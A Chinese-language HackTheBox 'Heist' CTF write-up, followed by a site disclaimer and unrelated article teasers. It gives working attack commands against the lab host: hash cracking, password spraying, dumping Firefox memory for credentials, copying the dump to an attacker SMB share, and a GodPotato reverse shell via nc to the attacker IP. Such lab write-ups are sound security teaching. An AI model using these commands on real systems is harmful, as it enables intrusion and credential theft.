HTB:Heist[WriteUP]

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用smbclient匿名访问靶机SMB服务器

使用wappalyzer查看靶机域名主界面技术栈

使用gobuster对靶机域名进行路径FUZZ

边界突破

使用浏览器访问/issues.php文件

使用john对该哈希值进行字典爆破

使用netexec通过上述凭证尝试枚举靶机SMB服务器中的用户

​编辑

使用netexec将上文枚举出的用户名与刚解密出来的两条密码进行密码喷洒

使用evil-winrm通过上述凭证登录靶机Win-RM服务

权限提升

在C:\Users\Chase\Desktop目录下可见一个清单列表

查看靶机系统进程

使用procdump将firefox内存转储

攻击机侧开启SMB服务器方便传输文件

回到一开始思科路由器登录界面使用BP抓取请求包

从转储文件中匹配该字符串

使用evil-winrm通过上述凭证登录靶机Win-RM服务

系统权限

查看靶机.NET框架版本

将.NET4版本的土豆上传至靶机


连接至HTB服务器并启动靶机

靶机IP:10.10.10.149

分配IP:10.10.16.21


信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.10.149 -r 1-65535 --ulimit 5000 | tee res

将靶机TCP开放端口号提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,                                                   
80,135,445,5985,49669
                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)                        
                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports                                                                
80,135,445,5985,49669

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn 10.10.10.149

  • 需要重点关注的端口和服务

80端口:HTTP服务

445端口:SMB服务

5985端口:Win-RM服务

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.149

使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.10.149

使用smbclient匿名访问靶机SMB服务器

smbclient -L \\10.10.10.149

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# smbclient -L \\10.10.10.149          
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED

  • 将heist.htb域名映射至靶机IP

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.149 heist.htb' /etc/hosts
                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n1 /etc/hosts                                              
10.10.10.149 heist.htb

使用wappalyzer查看靶机域名主界面技术栈

使用gobuster对靶机域名进行路径FUZZ


边界突破

使用浏览器访问/issues.php文件

  • 在该页可见一个附件超链接点击跳转后可得一串哈希密码,由它们的讨论也知道该WebAPP为思科路由器的登录界面

  • 从该文件中可知两个用户名:rout3r、admin

$1$pdQG$o8nrSzsGXeaduXrjlvKc91

  • 将该哈希值保存到文件中以便爆破
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > hash
使用john对该哈希值进行字典爆破
john hash --wordlist=../dictionary/rockyou.txt

stealth1agent

  • 结合上面该用户要求管理员为他创建一个Windows账户

使用netexec通过上述凭证尝试枚举靶机SMB服务器中的用户

netexec smb 10.10.10.149 -u hazard -p 'stealth1agent' --rid-brute

账户:hazard

密码:stealth1agent

  • 附件中还有两个经过Cisco TYPE 7加密过的密码

  • 使用在线解密工具直接解密即可

使用netexec将上文枚举出的用户名与刚解密出来的两条密码进行密码喷洒

账户:Chase

密码:Q4)sJu\Y8qz*A3?d

使用evil-winrm通过上述凭证登录靶机Win-RM服务
evil-winrm -i 10.10.10.149 -u 'chase' -p 'Q4)sJu\Y8qz*A3?d'

  • 在C:\Users\Chase\Desktop目录下找到user.txt文件


权限提升

在C:\Users\Chase\Desktop目录下可见一个清单列表

查看靶机系统进程

get-process

  • 我注意到进程中有firefox,而且看CPU占用似乎正在运行,也许他正在使用该流量对路由器进行维修

使用procdump将firefox内存转储

.\procdump64.exe -ma 6484 -accepteula

攻击机侧开启SMB服务器方便传输文件
impacket-smbserver temp . -smb2support

  • 控制靶机连接至攻击机SMB服务
net use Z: \\10.10.16.21\temp

  • 控制靶机将转储文件拷贝到攻击机共享目录中
cmd /c "copy firefox.exe_250122_171940.dmp Z:\"

*Evil-WinRM* PS C:\Users\Chase\Desktop> cmd /c "copy firefox.exe_250122_171940.dmp Z:\"
        1 file(s) copied.

回到一开始思科路由器登录界面使用BP抓取请求包

  • 由请求包可见,密码上传参数为:login_password
从转储文件中匹配该字符串
strings firefox.exe_250122_171940.dmp | grep login_password

4dD!5}x/re8]FBuZ

  • 使用上述密码,对靶机SMB服务器用户进行密码喷洒
netexec smb 10.10.10.149 -u names.txt -p '4dD!5}x/re8]FBuZ' --continue-on-success

账户:Administrator

密码:4dD!5}x/re8]FBuZ

使用evil-winrm通过上述凭证登录靶机Win-RM服务

evil-winrm -i 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'

  • 在C:\Users\Administrator\Desktop目录下找到root.txt文件


系统权限

查看靶机.NET框架版本

ls C:\Windows\Microsoft.NET\Framework

将.NET4版本的土豆上传至靶机
upload GodPotato-NET4.exe
  • 通过nc直接反弹shell
.\GodPotato-NET4.exe -cmd ".\nc64.exe -e cmd 10.10.16.21 1425"

  • 攻击机本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.21] from (UNKNOWN) [10.10.10.149] 49723
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

cd C:\Users\Administrator\Downloads

  • SAM、SYSTEM文件拷贝到当前目录

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/957828.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【HarmonyOS NEXT】华为分享-碰一碰开发分享

关键词:鸿蒙、碰一碰、systemShare、harmonyShare、Share Kit 华为分享新推出碰一碰分享,支持用户通过手机碰一碰发起跨端分享,可实现传输图片、共享wifi等。我们只需调用系统 api 传入所需参数拉起对应分享卡片模板即可,无需对 U…

使用Inno Setup软件制作.exe安装包

1.下一步: 2. 填写 程序名字 和 版本号: 3.设置安装路径信息 4.添加要打包的exe和依赖文件 5.为应用程序创建关联的文件 如果不需要就直接取消勾选 6.创建快捷方式 (1)第一种:常用 (1)第二种&am…

CPU 缓存基础知识

并发编程首先需要简单了解下现代CPU相关知识。通过一些简单的图,简单的代码,来认识CPU以及一些常见的问题。 目录 CPU存储与缓存的引入常见的三级缓存结构缓存一致性协议MESI协议缓存行 cache line 通过代码实例认识缓存行的重要性 CPU指令的乱序执行通过…

初步搭建并使用Scrapy框架

目录 目标 版本 实战 搭建框架 获取图片链接、书名、价格 通过管道下载数据 通过多条管道下载数据 下载多页数据 目标 掌握Scrapy框架的搭建及使用,本文以爬取当当网魔幻小说为案例做演示。 版本 Scrapy 2.12.0 实战 搭建框架 第一步:在D:\pyt…

Python - itertools- pairwise函数的详解

前言: 最近在leetcode刷题时用到了重叠对pairwise,这里就讲解一下迭代工具函数pairwise,既介绍给大家,同时也提醒一下自己,这个pairwise其实在刷题中十分有用,相信能帮助到你。 参考官方讲解:itertools --- 为高效循…

YOLO-cls训练及踩坑记录

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、模型训练 二、测试 三、踩坑记录 1、推理时设置的imgsz不生效 方法一: 方法二: 2、Windows下torchvision版本问题导致报错 总结 前…

云计算、AI与国产化浪潮下DBA职业之路风云变幻,如何谋破局启新途?

引言 在近日举办的一场「云和恩墨大讲堂」直播栏目中,云和恩墨联合创始人李轶楠、副总经理熊军和欧冶云商数据库首席薛晓刚共同探讨了DBA的现状与未来发展。三位专家从云计算、人工智能、国产化替代等多个角度进行了深入的分析和探讨,为从业者提供了宝贵…

PAT甲级-1017 Queueing at Bank

题目 题目大意 银行有k个窗口,每个窗口只能服务1个人。如果3个窗口已满,就需要等待。给出n个人到达银行的时间和服务时间,要求计算每个人的平均等待时间。如果某个人的到达时间超过17:00:00,则不被服务,等待时间也不计…

从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑

文章目录 从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑一 参考二 安装三 启动准备大模型文件 四 数据集(关键)!4.1 Alapaca格式4.2 sharegpt4.3 在 dataset_info.json 中注册4.4 官方 alpaca_zh_demo 例子 999条数据, 本机微调 5分…

AI刷题-策略大师:小I与小W的数字猜谜挑战

问题描述 有 1, 2,..., n ,n 个数字,其中有且仅有一个数字是中奖的,这个数字是等概率随机生成的。 Alice 和 Bob 进行一个游戏: 两人轮流猜一个 1 到 n 的数字,Alice 先猜。 每完成一次猜测,主持会大声…

【数据分享】1929-2024年全球站点的逐年最低气温数据(Shp\Excel\免费获取)

气象数据是在各项研究中都经常使用的数据,气象指标包括气温、风速、降水、湿度等指标!说到气象数据,最详细的气象数据是具体到气象监测站点的数据! 有关气象指标的监测站点数据,之前我们分享过1929-2024年全球气象站点…

CSDN 博客之星 2024:默语的技术进阶与社区耕耘之旅

CSDN 博客之星 2024:默语的技术进阶与社区耕耘之旅 🌟 默语,是一位在技术分享与社区建设中坚持深耕的博客作者。今年,我有幸再次入围成为 CSDN 博客之星TOP300 的一员,这既是对过往努力的肯定,也是对未来探…

计算机网络 (56)交互式音频/视频

一、定义与特点 定义:交互式音频/视频是指用户使用互联网和其他人进行实时交互式通信的技术,包括语音、视频图像等多媒体实时通信。 特点: 实时性:音频和视频数据是实时传输和播放的,用户之间可以进行即时的交流。交互…

Node.js——express中间件(全局中间件、路由中间件、静态资源中间件)

个人简介 👀个人主页: 前端杂货铺 🙋‍♂️学习方向: 主攻前端方向,正逐渐往全干发展 📃个人状态: 研发工程师,现效力于中国工业软件事业 🚀人生格言: 积跬步…

嵌入式知识点总结 ARM体系与架构 专题提升(一)-硬件基础

嵌入式知识点总结 ARM体系与架构 专题提升(一)-硬件基础 目录 1.NAND FLASH 和NOR FLASH异同 ? 2.CPU,MPU,MCU,SOC,SOPC联系与差别? 3.什么是交叉编译? 4.为什么要交叉编译? 5.描述一下嵌入式基于ROM的运行方式和基于RAM的运行方式有什么区别? 1…

【JavaSE】(8) String 类

一、String 类常用方法 1、构造方法 常用的这4种构造方法:直接法,或者传参字符串字面量、字符数组、字节数组。 在 JDK1.8 中,String 类的字符串实际存储在 char 数组中: String 类也重写了 toString 方法,所以可以直…

JS(6)-数组

一.数组的基本使用 1.数组:把多个数据存到一组 每个数组都有编号,从零开始,数组的编号叫索引或下标,可以存放数字,字符串等。 2.取值 3.遍历数组:用循环的方法把每个数都访问到 a)练习 首先,定…

查看电脑或笔记本CPU的核心数方法及CPU详细信息

一、通过任务管理器查看 1.打开任务管理器 可以按下“Ctrl Shift Esc”组合键,或者按下“Ctrl Alt Delete”组合键后选择“任务管理器”来打开。 2.查看CPU信息 在任务管理器界面中,点击“性能”标签页,找到CPU使用记录区域&#xff0c…

Docker核心命令与Yocto项目的高效应用

随着软件开发逐渐向分布式和容器化方向演进,Docker 已成为主流的容器化技术之一。它通过标准化的环境配置、资源隔离和高效的部署流程,大幅提高了开发和构建效率。Yocto 项目作为嵌入式 Linux 系统构建工具,与 Docker 的结合进一步增强了开发…

08-Elasticsearch

黑马商城作为一个电商项目,商品的搜索肯定是访问频率最高的页面之一。目前搜索功能是基于数据库的模糊搜索来实现的,存在很多问题。 首先,查询效率较低。 由于数据库模糊查询不走索引,在数据量较大的时候,查询性能很…